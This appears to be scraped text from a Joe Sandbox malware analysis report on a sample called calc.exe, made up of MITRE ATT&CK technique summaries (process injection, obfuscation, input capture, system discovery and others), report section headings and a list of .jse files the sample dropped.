Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report calc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\38gtKBXT3l.jse

C:\Users\user\Desktop\5BgbSwcYMy.jse

C:\Users\user\Desktop\BqmogIcAUc.jse

C:\Users\user\Desktop\G0MZ6GMwly.jse

C:\Users\user\Desktop\IDsLsRQlEe.jse

C:\Users\user\Desktop\Jtk8zxQOt2.jse

C:\Users\user\Desktop\PZr1luuECN.jse

C:\Users\user\Desktop\R7pPYI1mUq.jse

C:\Users\user\Desktop\Ssbk19MNG3.jse

C:\Users\user\Desktop\UqWLwYRtxi.jse

C:\Users\user\Desktop\VAJOf7ymJQ.jse

C:\Users\user\Desktop\cNs6XgJUw5.jse

C:\Users\user\Desktop\fevGSHOMU4.jse

C:\Users\user\Desktop\fhZL0KwyiV.jse

C:\Users\user\Desktop\iTc0FWDklf.jse

C:\Users\user\Desktop\iy4J2BVXGi.jse

C:\Users\user\Desktop\jkdKCpQjxW.jse

C:\Users\user\Desktop\mumMT6WOaG.jse

C:\Users\user\Desktop\nPYwCIjDlS.jse

C:\Users\user\Desktop\nmkcc07AEX.jse

C:\Users\user\Desktop\rbLiDVEIXX.jse

Windows Analysis Report
calc.exe

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre